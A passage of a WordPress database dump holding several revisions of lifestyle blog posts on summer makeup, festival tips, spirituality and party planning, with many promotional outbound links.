13:58:10','',164,'http://www.dailyjolly.co.uk/164-revision-v1',0,'revision','',0),(186,1,'2018-03-06 14:04:39','2018-03-06 14:04:39','<a href=\"/\"><img class=\"alignnone size-full wp-image-167\" src=\"http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/summer-makeup.jpg\" alt=\"Summer makeup tips\" width=\"960\" height=\"640\" /></a>\r\n\r\nI don\'t know about you, but this weather has turned me into a bit of a lazy slob, <em>especially</em> when it comes to makeup. I don\'t really want to be buffing in base and blending umpteen neutral eye shadows together first thing in the morning: <strong>instead, I want a look that\'s quick, easy and gets me out the front door and into the sunshine <em>stat.</em></strong>\r\n<h2>And today, I found it.</h2>\r\nFirst on the agenda was my ruddy complexion - I smoothed on a layer of NARS Pure Radiant Tinted Moisturiser; it has pretty good coverage, so I skipped concealer. It also contains SPF 30 in its formula, so my skin stays protected in the sun.\r\n\r\nNext up, a comb through my bushy brows and lashes with the Natural Collection Lash Care Mascara in Clear for subtle definition and a little bit of brow powder.\r\n\r\nOnto eyes, and I prepped the lids with NARS Smudge Proof Eyeshadow Base, which then stops my blush from sliding off my oily lids. In case you did a double take at that last sentence: yes, you read that right... blush as eyeshadow, <em>it\'s getting crazy in here</em>. I decided on a light sweep of NARS Blush in Liberte across my lids; this terracotta shade looks wonderful on the eyes, especially if you\'re sporting a bit of a tan. For more eye shadow ideas, <a href=\"http://www.katyperrybeauty.co.uk/eye-makeup\" target=\"_blank\" rel=\"noopener\">click here</a>.\r\n\r\n<a href=\"http://www.naturalenhancement.co.uk/tattoo-eyelinerhttp://\"><img class=\"alignnone size-full wp-image-169\" src=\"http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/eye-look.jpg\" alt=\"Semi permanent eyeliner\" width=\"960\" height=\"638\" /></a>\r\n\r\nSomething that is on most people\'s makeup list is perfecting their eyeliner. However, I am now completely over the days of panicking to get my eyeliner right with the perfect wing as I have had my eyeliner tattooed to the style that suits my eyes perfectly. My daily routine, both at home and on holiday is now 15 minutes faster. <a href=\"http://www.naturalenhancement.co.uk/tattoo-eyeliner\" target=\"_blank\" rel=\"noopener\">Check out the pros of eyeliner tattooing</a>.\r\n\r\nI then applied Daniel Sandler Watercolour Blusher in Spicey using a <a href=\"https://www.theannaedit.com/real-techniques-brushes-review/\" target=\"_blank\" rel=\"noopener\">Real Techniques Stippling Brush</a> for a long-lasting, natural flush to the apples of my cheeks, and finished with a slick of Revlon Super Lustrous Lipgloss in Kiss Me Coral.\r\n\r\nAnd when the heat gets a little too much, Avene Eau Thermal Water Spray has been a saviour for when I\'m starting to look all shiny but don\'t want to add anymore product to the minimally made-up face. <a href=\"http://nontoxicmatters.co.uk/skin_care_tips.php\" target=\"_blank\" rel=\"noopener\">View tips for perfect skin</a>.\r\n<h3>Brighten your smile with teeth whitening</h3>\r\nEven with the best makeup, dull-looking teeth can affect your appearance. The simple process of having laser teeth whitening will get your teeth 8 shades lighter in just one session.\r\n\r\n<strong>Freshen up your look with teeth whitening from a leading cosmetic dentist. <a href=\"https://www.hockerilldental.com/treatments/cosmetic-dentistry\" target=\"_blank\" rel=\"noopener\">Find out more.</a></strong>','Summer makeup tips to keep you glowing with minimal makeup!','','inherit','closed','closed','','164-revision-v1','','','2018-03-06 14:04:39','2018-03-06 14:04:39','',164,'http://www.dailyjolly.co.uk/164-revision-v1',0,'revision','',0),(188,1,'2018-03-21 09:59:46','2018-03-21 09:59:46','<h2 class=\"title\">Are you going to a festival in the summer of 2018? Read our tips today!</h2>\nIf you\'re lucky enough to be heading to one of this year\'s fabulous festivals, we\'ve got some great hints and tips for the practical side of things. The fun part of it is up to you!\n<ol>\n 	<li><strong>Pack for the arrival trudge</strong> - there are some obvious must-haves like a tent, sleeping bag, clothes, good shoes, earplugs etc. But keeping it streamlined will make lugging your gear that bit easier. If you forget something, you can probably buy it there. And valuables? If you don\'t want to lose it, leave it at home.</li>\n 	<li><strong>Work at the festival to save some money! </strong>- Festivals always need staff and volunteers to keep everything running - and you get a free ticket to the festival! You can apply directly or apply to event staffing agencies for various roles like checking tickets and working at the bar. <a href=\"https://www.streetpr.co.uk/events/bar-staff\" target=\"_blank\" rel=\"noopener\">Click here for bar work.</a></li>\n 	<li><strong>TAKE. YOUR. WELLIES.</strong> - the forecast may be glorious but that hot, steamy day can turn into a thundery, wet night. Wellies are worth their weight in gold when the rain hits. At least make sure they\'re in the car, even if you don\'t carry them all the way in.</li>\n 	<li><strong>Remember where you parked</strong> - write it, share it, repeat it, chant it, do whatever you can to remember it! Searching for your motor in amongst 50,000 others can take a long, long time. <a href=\"http://www.carparkstars.uk/\" target=\"_blank\" rel=\"noopener\">Click here for parking</a>.</li>\n 	<li><strong>Camp wisely</strong> - first, find a good spot. Not at the bottom of a hill (muddy ditch alert) and not next to the loos, unless you really don\'t mind festival smells and doors banging all night long. Once you\'ve pitched your tent, look for a big, obvious landmark so that you can always find your way back. If you don\'t fancy camping, <a href=\"http://annandale-hotel.co.uk/\" target=\"_blank\" rel=\"noopener\">book into a hotel!</a></li>\n 	<li><strong>Always carry a torch</strong> - your little morning walk could turn into an all day adventure. Keep a torch in your bag so that you\'ve always got a way to shine your path back to base.</li>\n 	<li><strong>Pick up your litter</strong> - once the fun\'s over, festival sites are strewn with all kinds of rubbish that can harm animals, big and small. For a cleaner festival and a sparkly clear conscience, pick it all up and put it in the bin.</li>\n 	<li><strong>Have a plan to stay safe</strong> - festivals are big and busy. Try to get your bearings, carry a map and have a meeting point set up in case anyone gets lost. If you have kiddos in your group, a wristband with your details on it can be great peace of mind.</li>\n 	<li><strong>Find your shower power</strong> - most festivals have great facilities, often with long queues. Pick a time when everyone else is asleep or busy watching the biggest bands and you might just walk right in. Our <a href=\"http://www.ecoverdirect.com/tags/mizu.aspx?tag=Mizu\" target=\"_blank\" rel=\"noopener\">Mizu body care range</a> is a great choice for feeling fresh again. Find out more about <a href=\"http://www.dailyjolly.co.uk/ecover-products-contain-no-nasties\">eco-friendly products.</a></li>\n 	<li><strong>Go with the flow</strong> - with so many bands and acts to see, it\'s easy to end up racing all over the place. Our festival pros recommend choosing one or two must-sees for the day, and letting the festival vibe carry you the rest of the way.</li>\n 	<li><strong>Try something new</strong> - Lebanese food, reflexology, hat making, laughter workshops, festivals are the place to experience all things weird, wild and wonderful. You never know, you might find your new passion in life!</li>\n</ol>','Are you going to a festival in the summer of 2018? Read our tips today!','\'s summer festival hints and tips - our survival guide for a summer of fun.','inherit','closed','closed','','38-autosave-v1','','','2018-03-21 09:59:46','2018-03-21 09:59:46','',38,'http://www.dailyjolly.co.uk/38-autosave-v1',0,'revision','',0),(189,1,'2018-03-21 09:54:19','2018-03-21 09:54:19','<h2 class=\"title\">Are you going to a festival in the summer of 2018? Read our tips today!</h2>\r\nIf you\'re lucky enough to be heading to one of this year\'s fabulous festivals, we\'ve got some great hints and tips for the practical side of things. The fun part of it is up to you!\r\n<ol>\r\n 	<li><strong>Pack for the arrival trudge</strong> - there are some obvious must-haves like a tent, sleeping bag, clothes, good shoes, earplugs etc. But keeping it streamlined will make lugging your gear that bit easier. If you forget something, you can probably buy it there. And valuables? If you don\'t want to lose it, leave it at home.</li>\r\n 	<li><strong>Remember where you parked</strong> - write it, share it, repeat it, chant it, do whatever you can to remember it! Searching for your motor in amongst 50,000 others can take a long, long time.</li>\r\n 	<li><strong>Work at the festival to save some money! </strong>- Festivals always need staff and volunteers to keep everything running - and you get a free ticket to the festival! You can apply directly or apply to event staffing agencies for various roles like checking tickets and working at the bar. <a href=\"https://www.streetpr.co.uk/events/bar-staff\" target=\"_blank\" rel=\"noopener\">Click here for bar work.</a></li>\r\n 	<li><strong>TAKE. YOUR. WELLIES.</strong> - the forecast may be glorious but that hot, steamy day can turn into a thundery, wet night. Wellies are worth their weight in gold when the rain hits. At least make sure they\'re in the car, even if you don\'t carry them all the way in.</li>\r\n 	<li><strong>Camp wisely</strong> - first, find a good spot. Not at the bottom of a hill (muddy ditch alert) and not next to the loos, unless you really don\'t mind festival smells and doors banging all night long. Once you\'ve pitched your tent, look for a big, obvious landmark so that you can always find your way back.</li>\r\n 	<li><strong>Always carry a torch</strong> - your little morning walk could turn into an all day adventure. Keep a torch in your bag so that you\'ve always got a way to shine your path back to base.</li>\r\n 	<li><strong>Pick up your litter</strong> - once the fun\'s over, festival sites are strewn with all kinds of rubbish that can harm animals, big and small. For a cleaner festival and a sparkly clear conscience, pick it all up and put it in the bin.</li>\r\n 	<li><strong>Have a plan to stay safe</strong> - festivals are big and busy. Try to get your bearings, carry a map and have a meeting point set up in case anyone gets lost. If you have kiddos in your group, a wristband with your details on it can be great peace of mind.</li>\r\n 	<li><strong>Find your shower power</strong> - most festivals have great facilities, often with long queues. Pick a time when everyone else is asleep or busy watching the biggest bands and you might just walk right in. Our <a href=\"http://www.ecoverdirect.com/tags/mizu.aspx?tag=Mizu\" target=\"_blank\" rel=\"noopener\">Mizu body care range</a> is a great choice for feeling fresh again.</li>\r\n 	<li><strong>Go with the flow</strong> - with so many bands and acts to see, it\'s easy to end up racing all over the place. Our festival pros recommend choosing one or two must-sees for the day, and letting the festival vibe carry you the rest of the way.</li>\r\n 	<li><strong>Try something new</strong> - Lebanese food, reflexology, hat making, laughter workshops, festivals are the place to experience all things weird, wild and wonderful. You never know, you might find your new passion in life!</li>\r\n</ol>','Are you going to a festival in the summer of 2018? Read our tips today!','\'s summer festival hints and tips - our survival guide for a summer of fun.','inherit','closed','closed','','38-revision-v1','','','2018-03-21 09:54:19','2018-03-21 09:54:19','',38,'http://www.dailyjolly.co.uk/38-revision-v1',0,'revision','',0),(190,1,'2018-03-21 09:58:42','2018-03-21 09:58:42','<h2 class=\"title\">Are you going to a festival in the summer of 2018? Read our tips today!</h2>\r\nIf you\'re lucky enough to be heading to one of this year\'s fabulous festivals, we\'ve got some great hints and tips for the practical side of things. The fun part of it is up to you!\r\n<ol>\r\n 	<li><strong>Pack for the arrival trudge</strong> - there are some obvious must-haves like a tent, sleeping bag, clothes, good shoes, earplugs etc. But keeping it streamlined will make lugging your gear that bit easier. If you forget something, you can probably buy it there. And valuables? If you don\'t want to lose it, leave it at home.</li>\r\n 	<li><strong>Work at the festival to save some money! </strong>- Festivals always need staff and volunteers to keep everything running - and you get a free ticket to the festival! You can apply directly or apply to event staffing agencies for various roles like checking tickets and working at the bar. <a href=\"https://www.streetpr.co.uk/events/bar-staff\" target=\"_blank\" rel=\"noopener\">Click here for bar work.</a></li>\r\n 	<li><strong>TAKE. YOUR. WELLIES.</strong> - the forecast may be glorious but that hot, steamy day can turn into a thundery, wet night. Wellies are worth their weight in gold when the rain hits. At least make sure they\'re in the car, even if you don\'t carry them all the way in.</li>\r\n 	<li><strong>Remember where you parked</strong> - write it, share it, repeat it, chant it, do whatever you can to remember it! Searching for your motor in amongst 50,000 others can take a long, long time. <a href=\"http://www.carparkstars.uk/\" target=\"_blank\" rel=\"noopener\">Click here for parking</a>.</li>\r\n 	<li><strong>Camp wisely</strong> - first, find a good spot. Not at the bottom of a hill (muddy ditch alert) and not next to the loos, unless you really don\'t mind festival smells and doors banging all night long. Once you\'ve pitched your tent, look for a big, obvious landmark so that you can always find your way back. If you don\'t fancy camping, <a href=\"http://annandale-hotel.co.uk/\" target=\"_blank\" rel=\"noopener\">book into a hotel!</a></li>\r\n 	<li><strong>Always carry a torch</strong> - your little morning walk could turn into an all day adventure. Keep a torch in your bag so that you\'ve always got a way to shine your path back to base.</li>\r\n 	<li><strong>Pick up your litter</strong> - once the fun\'s over, festival sites are strewn with all kinds of rubbish that can harm animals, big and small. For a cleaner festival and a sparkly clear conscience, pick it all up and put it in the bin.</li>\r\n 	<li><strong>Have a plan to stay safe</strong> - festivals are big and busy. Try to get your bearings, carry a map and have a meeting point set up in case anyone gets lost. If you have kiddos in your group, a wristband with your details on it can be great peace of mind.</li>\r\n 	<li><strong>Find your shower power</strong> - most festivals have great facilities, often with long queues. Pick a time when everyone else is asleep or busy watching the biggest bands and you might just walk right in. Our <a href=\"http://www.ecoverdirect.com/tags/mizu.aspx?tag=Mizu\" target=\"_blank\" rel=\"noopener\">Mizu body care range</a> is a great choice for feeling fresh again.</li>\r\n 	<li><strong>Go with the flow</strong> - with so many bands and acts to see, it\'s easy to end up racing all over the place. Our festival pros recommend choosing one or two must-sees for the day, and letting the festival vibe carry you the rest of the way.</li>\r\n 	<li><strong>Try something new</strong> - Lebanese food, reflexology, hat making, laughter workshops, festivals are the place to experience all things weird, wild and wonderful. You never know, you might find your new passion in life!</li>\r\n</ol>','Are you going to a festival in the summer of 2018? Read our tips today!','\'s summer festival hints and tips - our survival guide for a summer of fun.','inherit','closed','closed','','38-revision-v1','','','2018-03-21 09:58:42','2018-03-21 09:58:42','',38,'http://www.dailyjolly.co.uk/38-revision-v1',0,'revision','',0),(191,1,'2018-03-21 10:00:17','2018-03-21 10:00:17','<h2 class=\"title\">Are you going to a festival in the summer of 2018? Read our tips today!</h2>\r\nIf you\'re lucky enough to be heading to one of this year\'s fabulous festivals, we\'ve got some great hints and tips for the practical side of things. The fun part of it is up to you!\r\n<ol>\r\n 	<li><strong>Pack for the arrival trudge</strong> - there are some obvious must-haves like a tent, sleeping bag, clothes, good shoes, earplugs etc. But keeping it streamlined will make lugging your gear that bit easier. If you forget something, you can probably buy it there. And valuables? If you don\'t want to lose it, leave it at home. <a href=\"http://www.dailyjolly.co.uk/travel-hints-and-tips\">Read our top travel tips.</a></li>\r\n 	<li><strong>Work at the festival to save some money! </strong>- Festivals always need staff and volunteers to keep everything running - and you get a free ticket to the festival! You can apply directly or apply to event staffing agencies for various roles like checking tickets and working at the bar. <a href=\"https://www.streetpr.co.uk/events/bar-staff\" target=\"_blank\" rel=\"noopener\">Click here for bar work.</a></li>\r\n 	<li><strong>TAKE. YOUR. WELLIES.</strong> - the forecast may be glorious but that hot, steamy day can turn into a thundery, wet night. Wellies are worth their weight in gold when the rain hits. At least make sure they\'re in the car, even if you don\'t carry them all the way in.</li>\r\n 	<li><strong>Remember where you parked</strong> - write it, share it, repeat it, chant it, do whatever you can to remember it! Searching for your motor in amongst 50,000 others can take a long, long time. <a href=\"http://www.carparkstars.uk/\" target=\"_blank\" rel=\"noopener\">Click here for parking</a>.</li>\r\n 	<li><strong>Camp wisely</strong> - first, find a good spot. Not at the bottom of a hill (muddy ditch alert) and not next to the loos, unless you really don\'t mind festival smells and doors banging all night long. Once you\'ve pitched your tent, look for a big, obvious landmark so that you can always find your way back. If you don\'t fancy camping, <a href=\"http://annandale-hotel.co.uk/\" target=\"_blank\" rel=\"noopener\">book into a hotel!</a></li>\r\n 	<li><strong>Always carry a torch</strong> - your little morning walk could turn into an all day adventure. Keep a torch in your bag so that you\'ve always got a way to shine your path back to base.</li>\r\n 	<li><strong>Pick up your litter</strong> - once the fun\'s over, festival sites are strewn with all kinds of rubbish that can harm animals, big and small. For a cleaner festival and a sparkly clear conscience, pick it all up and put it in the bin.</li>\r\n 	<li><strong>Have a plan to stay safe</strong> - festivals are big and busy. Try to get your bearings, carry a map and have a meeting point set up in case anyone gets lost. If you have kiddos in your group, a wristband with your details on it can be great peace of mind.</li>\r\n 	<li><strong>Find your shower power</strong> - most festivals have great facilities, often with long queues. Pick a time when everyone else is asleep or busy watching the biggest bands and you might just walk right in. Our <a href=\"http://www.ecoverdirect.com/tags/mizu.aspx?tag=Mizu\" target=\"_blank\" rel=\"noopener\">Mizu body care range</a> is a great choice for feeling fresh again. Find out more about <a href=\"http://www.dailyjolly.co.uk/ecover-products-contain-no-nasties\">eco-friendly products.</a></li>\r\n 	<li><strong>Go with the flow</strong> - with so many bands and acts to see, it\'s easy to end up racing all over the place. Our festival pros recommend choosing one or two must-sees for the day, and letting the festival vibe carry you the rest of the way.</li>\r\n 	<li><strong>Try something new</strong> - Lebanese food, reflexology, hat making, laughter workshops, festivals are the place to experience all things weird, wild and wonderful. You never know, you might find your new passion in life!</li>\r\n</ol>','Are you going to a festival in the summer of 2018? Read our tips today!','\'s summer festival hints and tips - our survival guide for a summer of fun.','inherit','closed','closed','','38-revision-v1','','','2018-03-21 10:00:17','2018-03-21 10:00:17','',38,'http://www.dailyjolly.co.uk/38-revision-v1',0,'revision','',0),(193,1,'2018-10-19 10:57:53','2018-10-19 10:57:53','<h3>Connect with Your Spiritual Side</h3>\r\n<em>Why is spiritually Important? The term ‘spiritually\' tends to be greeted with scepticism, yet it\'s benefits are continuously ignored. </em>\r\n\r\nGrowing evidence indicates that spending time with your divine self can help <strong>improve and maintain your mental state and general well-being.</strong>\r\n<blockquote><em>\"In today\'s world, we\'re more connected than ever and have technology that should help free up our own time. However, we\'re reluctant to dedicate time to ourselves. It\'s incredibly important to assess yourself, goals and decisions to help provide clarity.\"</em></blockquote>\r\n<h4>There are various ways to help connect with your spiritual side. These include:</h4>\r\n<ul>\r\n 	<li><strong><a href=\"https://www.healthline.com/nutrition/12-benefits-of-meditation\" target=\"_blank\" rel=\"noopener\">Meditation</a>.</strong> For centuries, humans have used this practice as a way to improve our concentration and attention whilst focusing on deeper thoughts. Furthermore, it can help us regulate emotions and think about matters rationally.</li>\r\n 	<li><strong><a href=\"https://www.clairvoyant.co/tarot\">Spiritual Advisor</a>.</strong> It isn\'t uncommon to have a spiritual advisor in your life. They come in various forms, such as life coaches or clairvoyants, sometimes both. Tarot cards are one of the many tools that can help provide you guidance and clarity in your life. Tarot readers are skilled and an accurate reading is hard to come by, but this <a href=\"https://www.juneauempire.com/marketplace/online-tarot-reading-top-3-tarot-card-reading-sites-for-accurate-future-predictions/\">top list on JuneauEmpire</a> can give you some advice on who to choose if you\'re looking for someone to read your cards. This will help you to see where you are headed in life, which is especially useful if the way forward isn\'t clear to you right now.\r\n</li>\r\n 	<li><strong><a href=\"https://theculturetrip.com/europe/united-kingdom/england/london/articles/8-london-yoga-studios-you-should-know/\" target=\"_blank\" rel=\"noopener\">Yoga</a>.</strong> A combination of spiritual and physical activity, yoga can greatly benefit your mental and physical health. It can help reduce stress, depression and anxiety whilst focusing on improving your own well-being and outlook on life.</li>\r\n</ul>\r\n<blockquote><em>\"These activities are solely designed to benefit you. We can find ourselves stressed over things that didn\'t use to bother us. Your spiritual side helps provide you with the guidance you may be lacking.\"</em></blockquote>\r\n<p style=\"text-align: center;\"><strong>Your mental well-being is something you shouldn\'t ignore. We strongly recommend trying out these spiritual outlets.</strong></p>\r\nIf you believe that you\'re struggling to find your purpose or you\'re affected by relationships and your career, then it<strong> may be time to seek spiritual help that will benefit you.</strong>','The Power of Freeing Your Mind','','publish','closed','closed','','the-power-of-freeing-your-mind','','','2018-10-19 10:57:53','2018-10-19 10:57:53','',0,'http://www.dailyjolly.co.uk/?page_id=193',0,'page','',0),(194,1,'2018-10-19 10:56:31','2018-10-19 10:56:31','<h3>Connect with Your Spiritual Side</h3>\r\n<em>Why is spiritually Important? The term ‘spiritually’ tends to be greeted with scepticism, yet it’s benefits are continuously ignored. </em>\r\n\r\nGrowing evidence indicates that spending time with your divine self can help <strong>improve and maintain your mental state and general well-being.</strong>\r\n<blockquote><em>“In today’s world, we’re more connected than ever and have technology that should help free up our own time. However, we’re reluctant to dedicate time to ourselves. It’s incredibly important to assess yourself, goals and decisions to help provide clarity.”</em></blockquote>\r\n<h4>There are various ways to help connect with your spiritual side. These include:</h4>\r\n<ul>\r\n 	<li><strong><a href=\"https://www.healthline.com/nutrition/12-benefits-of-meditation\">Meditation</a>.</strong> For centuries, humans have used this practice as a way to improve our concentration and attention whilst focusing on deeper thoughts. Furthermore, it can help us regulate emotions and think about matters rationally.</li>\r\n 	<li><strong><a href=\"https://www.clairvoyant.co/tarot\">Spiritual Advisor</a>.</strong> It isn’t uncommon to have a spiritual advisor in your life. They come in various forms, such as life coaches or clairvoyants, sometimes both. Tarot cards are one of the many tools that can help provide you guidance and clarity in your life.</li>\r\n 	<li><strong><a href=\"https://theculturetrip.com/europe/united-kingdom/england/london/articles/8-london-yoga-studios-you-should-know/\">Yoga</a>.</strong> A combination of spiritual and physical activity, yoga can greatly benefit your mental and physical health. It can help reduce stress, depression and anxiety whilst focusing on improving your own well-being and outlook on life.</li>\r\n</ul>\r\n<blockquote><em>“These activities are solely designed to benefit you. We can find ourselves stressed over things that didn’t use to bother us. Your spiritual side helps provide you with the guidance you may be lacking.”</em></blockquote>\r\n<p style=\"text-align: center;\"><strong>Your mental well-being is something you shouldn’t ignore. We strongly recommend trying out these spiritual outlets.</strong></p>\r\nIf you believe that you’re struggling to find your purpose or you’re affected by relationships and your career, then it<strong> may be time to seek spiritual help that will benefit you.</strong>','The Power of Freeing Your Mind','','inherit','closed','closed','','193-revision-v1','','','2018-10-19 10:56:31','2018-10-19 10:56:31','',193,'http://www.dailyjolly.co.uk/193-revision-v1',0,'revision','',0),(195,1,'2018-10-19 10:57:32','2018-10-19 10:57:32','','team-spirit-2447163_960_720','','inherit','open','closed','','team-spirit-2447163_960_720','','','2018-10-19 10:57:32','2018-10-19 10:57:32','',193,'http://www.dailyjolly.co.uk/wp-content/uploads/2018/10/team-spirit-2447163_960_720.jpg',0,'attachment','image/jpeg',0),(196,1,'2018-10-19 10:57:38','2018-10-19 10:57:38','<h3>Connect with Your Spiritual Side</h3>\r\n<em>Why is spiritually Important? The term ‘spiritually’ tends to be greeted with scepticism, yet it’s benefits are continuously ignored. </em>\r\n\r\nGrowing evidence indicates that spending time with your divine self can help <strong>improve and maintain your mental state and general well-being.</strong>\r\n<blockquote><em>“In today’s world, we’re more connected than ever and have technology that should help free up our own time. However, we’re reluctant to dedicate time to ourselves. It’s incredibly important to assess yourself, goals and decisions to help provide clarity.”</em></blockquote>\r\n<h4>There are various ways to help connect with your spiritual side. These include:</h4>\r\n<ul>\r\n 	<li><strong><a href=\"https://www.healthline.com/nutrition/12-benefits-of-meditation\" target=\"_blank\" rel=\"noopener\">Meditation</a>.</strong> For centuries, humans have used this practice as a way to improve our concentration and attention whilst focusing on deeper thoughts. Furthermore, it can help us regulate emotions and think about matters rationally.</li>\r\n 	<li><strong><a href=\"https://www.clairvoyant.co/tarot\">Spiritual Advisor</a>.</strong> It isn’t uncommon to have a spiritual advisor in your life. They come in various forms, such as life coaches or clairvoyants, sometimes both. Tarot cards are one of the many tools that can help provide you guidance and clarity in your life.</li>\r\n 	<li><strong><a href=\"https://theculturetrip.com/europe/united-kingdom/england/london/articles/8-london-yoga-studios-you-should-know/\" target=\"_blank\" rel=\"noopener\">Yoga</a>.</strong> A combination of spiritual and physical activity, yoga can greatly benefit your mental and physical health. It can help reduce stress, depression and anxiety whilst focusing on improving your own well-being and outlook on life.</li>\r\n</ul>\r\n<blockquote><em>“These activities are solely designed to benefit you. We can find ourselves stressed over things that didn’t use to bother us. Your spiritual side helps provide you with the guidance you may be lacking.”</em></blockquote>\r\n<p style=\"text-align: center;\"><strong>Your mental well-being is something you shouldn’t ignore. We strongly recommend trying out these spiritual outlets.</strong></p>\r\nIf you believe that you’re struggling to find your purpose or you’re affected by relationships and your career, then it<strong> may be time to seek spiritual help that will benefit you.</strong>','The Power of Freeing Your Mind','','inherit','closed','closed','','193-revision-v1','','','2018-10-19 10:57:38','2018-10-19 10:57:38','',193,'http://www.dailyjolly.co.uk/193-revision-v1',0,'revision','',0),(198,1,'2018-10-19 10:58:52','2018-10-19 10:58:52',' ','','','publish','closed','closed','','198','','','2018-10-19 10:58:52','2018-10-19 10:58:52','',0,'http://www.dailyjolly.co.uk/198',10,'nav_menu_item','',0),(200,1,'2019-05-31 11:32:40','2019-05-31 11:32:40','<em>Party planning, whether it\'s for a wedding, corporate event or a birthday, will require a bit of work in the planning and preparation stage to make sure everything goes according to plan. Some people struggle with getting organised themselves and would instead prefer to seek assistance from <a href=\"https://www.smartworksevents.com/\">event management companies in Europe</a>. If you\'re prepared to try and tackle event planning yourself though, here are the fundamentals that get help get you started.</em>\r\n\r\n<strong>Choosing a date for the event is just the start.</strong> There are a few key aspects you\'ll have to consider when it comes to planning your party. Here at Daily Jolly, we\'ve asked around and researched some of the fundamentals of party planning that you\'ll have to think about too.\r\n<h3>  Invites</h3>\r\nThe invitation list is definitely key when it comes to planning your party. Most people seem to think that the date is the most important aspect of planning a party, and whilst it\'s essential that you have a date to put in the diary as soon as possible, you can\'t schedule a date or a party without first having a venue. For example, somewhere like this <a href=\"https://www.chateauxatfox.com/\">corporate party venue denver</a> option has been called upon on various occasions when people are looking to organize a corporate event, and has been known to provide guests with a lot of fun. So once a venue of your choosing has been booked, then you can proceed with the other aspects of your invitation. What sort of party do you want? You\'ll have to think about the different types of atmosphere your party will have depending on the guests you invite.\r\n<blockquote>Furthermore, you can really begin to set the theme for your party by choosing from a range of invite designs.</blockquote>\r\nBeyond that, party invites are important simply because it\'ll give you a clear indication of how many people are coming to the event. <a href=\"https://www.canva.com/create/cards/party-invitations/\">Design your party invites.</a>\r\n<h3>Theme</h3>\r\nTo create a truly memorable event, it\'s always worth thinking and planning for a specific theme in mind. A <a href=\"https://chrystinanoel.com/2017/01/31/choose-party-theme-party-planning-101/\">well-chosen theme</a> can really add to the occasion, and make it a night worth remembering for all your guests.\r\n\r\n<strong>You shouldn\'t try and be too elaborate with your theme, and you should also think about the guests you\'ll be inviting too.</strong>\r\n\r\nUltimately, you want to choose a theme that\'ll add to the experience, not detract from it, so it\'s important to choose the right theme for the night.\r\n\r\n<h3>Food</h3>\r\nIt is always worth thinking about food beforehand as you don\'t want to be rushing around on the day trying to slice sandwiches. You can have a look for <a href=\"https://larryssubs.com/category/catering\">subs catering</a> companies or similar that can prepare party platters that only need picking up. This takes the stress away and gives you more time to get ready for the party yourself!\r\n\r\nAlso think about what types of food you want to serve. Catering is a great option if you plan to let the guests stay for a full meal, but you might also want to think of snacks and beverages to keep the guests going for a while before the meal. You can get a variety of nibbles, desserts, chocolate, etc. that you can stock up on from your local store. However, you can also skip the hassle and get them delivered to your home (or party location) if you shop from online marketplaces like <a href=\"https://www.clickmarketplace.co.uk/\">clickmarketplace.co.uk</a>. Power of the Internet, people!\r\n<h3>Equipment Hire</h3>\r\nTheme planning and choosing a venue are incredibly important, but you want to make sure you have the <a href=\"https://www.crackajack-partyhire.com.au/\">necessary equipment</a> to make the night a success.\r\n\r\nThere is a range of services that offer party and event equipment hire, as well as offering staff and food services for the day. You\'ll need to research potential even companies and check the success they\'ve overseen in the past.','The Fundamentals in Party Planning','','publish','open','open','','the-fundamentals-in-party-planning','','','2019-05-31 15:21:19','2019-05-31 15:21:19','',0,'http://www.dailyjolly.co.uk/?p=200',0,'post','',0),(201,1,'2019-05-31 11:31:22','2019-05-31 11:31:22','','party-hire-perth','','inherit','open','closed','','party-hire-perth','','','2019-05-31 11:31:26','2019-05-31 11:31:26','',200,'http://www.dailyjolly.co.uk/wp-content/uploads/2019/05/party-hire-perth.jpg',0,'attachment','image/jpeg',0),(202,1,'2019-05-31 11:32:32','2019-05-31 11:32:32','<em>Party planning, whether it’s for a wedding, corporate event or a birthday, requires a bit of work in planning and preparation to make sure everything goes according to plan.</em>\r\n\r\n<strong>Choosing a date for the event is just the start.</strong> There are a few key aspects you’ll have to consider when it comes to planning your party. Here at Daily Jolly, we’ve asked around and researched some of the fundamentals of party planning that you’ll have to think about too.\r\n<h3> Invites</h3>\r\nThe invitation list is definitely key when it comes to planning your party. What sort of party do you want? You’ll have to think about the different types of atmosphere your party will have depending on the guests you invite.\r\n<blockquote>Furthermore, you can really begin to set the theme for your party by choosing from a range of invite designs.</blockquote>\r\nBeyond that, party invites are important simply because it’ll give you a clear indication of how many people are coming to the event.\r\n<h3>Theme</h3>\r\nTo create a truly memorable event, it’s always worth thinking and planning for a specific theme in mind. A well-chosen theme can really add to the occasion, and make it a night worth remembering for all your guests.\r\n\r\n<strong>You shouldn’t try and be too elaborate with your theme, and you should also think about the guests you’ll be inviting too.</strong>\r\n\r\nUltimately, you want to choose a theme that’ll add to the experience, not detract from it, so it’s important to choose the right theme for the night.\r\n<h3>Equipment Hire</h3>\r\nTheme planning and choosing a venue are incredibly important, but you want to make sure you have the necessary equipment to make the night a success.\r\n\r\nThere is a range of services that offer party and event equipment hire, as well as offering staff and food services for the day. You’ll need to research potential even companies and check the success they’ve overseen in the past.','The Fundamentals in Party Planning','','inherit','closed','closed','','200-revision-v1','','','2019-05-31 11:32:32','2019-05-31 11:32:32','',200,'http://www.dailyjolly.co.uk/200-revision-v1',0,'revision','',0),(203,1,'2019-05-31 15:20:23','2019-05-31 15:20:23','<em>Party planning, whether it’s for a wedding, corporate event or a birthday, requires a bit of work in planning and preparation to make sure everything goes according to plan.</em>\n\n<strong>Choosing a date for the event is just the start.</strong> There are a few key aspects you’ll have to consider when it comes to planning your party. Here at Daily Jolly, we’ve asked around and researched some of the fundamentals of party planning that you’ll have to think about too.\n<h3> Invites</h3>\nThe invitation list is definitely key when it comes to planning your party. What sort of party do you want? You’ll have to think about the different types of atmosphere your party will have depending on the guests you invite.\n<blockquote>Furthermore, you can really begin to set the theme for your party by choosing from a range of invite designs.</blockquote>\nBeyond that, party invites are important simply because it’ll give you a clear indication of how many people are coming to the event.\n<h3>Theme</h3>\nTo create a truly memorable event, it’s always worth thinking and planning for a specific theme in mind. A <a href=\"https://chrystinanoel.com/2017/01/31/choose-party-theme-party-planning-101/\">well-chosen theme</a> can really add to the occasion, and make it a night worth remembering for all your guests.\n\n<strong>You shouldn’t try and be too elaborate with your theme, and you should also think about the guests you’ll be inviting too.</strong>\n\nUltimately, you want to choose a theme that’ll add to the experience, not detract from it, so it’s important to choose the right theme for the night.\n<h3>Equipment Hire</h3>\nTheme planning and choosing a venue are incredibly important, but you want to make sure you have the <a href=\"https://www.crackajack-partyhire.com.au/\">necessary equipment</a> to make the night a success.\n\nThere is a range of services that offer party and event equipment hire, as well as offering staff and food services for 